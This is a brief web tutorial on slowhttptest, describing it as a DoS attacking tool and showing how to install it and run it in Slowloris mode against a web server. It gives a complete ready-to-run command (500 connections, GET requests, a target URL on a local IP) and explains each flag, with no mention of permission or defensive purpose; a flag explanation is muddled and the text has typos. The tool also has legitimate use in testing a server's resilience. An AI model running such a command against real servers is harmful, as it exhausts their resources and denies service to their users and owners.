In this tutorial we are going to learn what is slowhttptest and how to use it.
Here you can see now what is slowhttptest and how to use it.
- Slowhttptest is one of the DoS attacking tools.
- It especially uses HTTP protocol to connect with the server and to keep the resources busy such as CPU and RAM.
- You can type “slowhttptest –h” to see all the paramenters that you need to use.
- In case you receive an output, ‘Command not found’ you have to first type “
- #apt-get install slowhttptest
- # slowhttptest –h
- # slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2
Explation Of Slowhttptest
- (-c 500) = 500connections
- (-H)= Slowloris mode
- -g= Generate statistics
- -o outputfile= Output file name
- –i 10= Use 10 seconds to wait for data
- -r 200= 200 connections with -t GET = GET requests
- -u http://192.168.1.202/index.php= target URL
- -x 24= maximum of length of 24 bytes
-p 2= 2-second timeout
This is all what is slowhttptest and how to use it.
If you want to lean more about http server and how to configure it so by clicking this link you can see it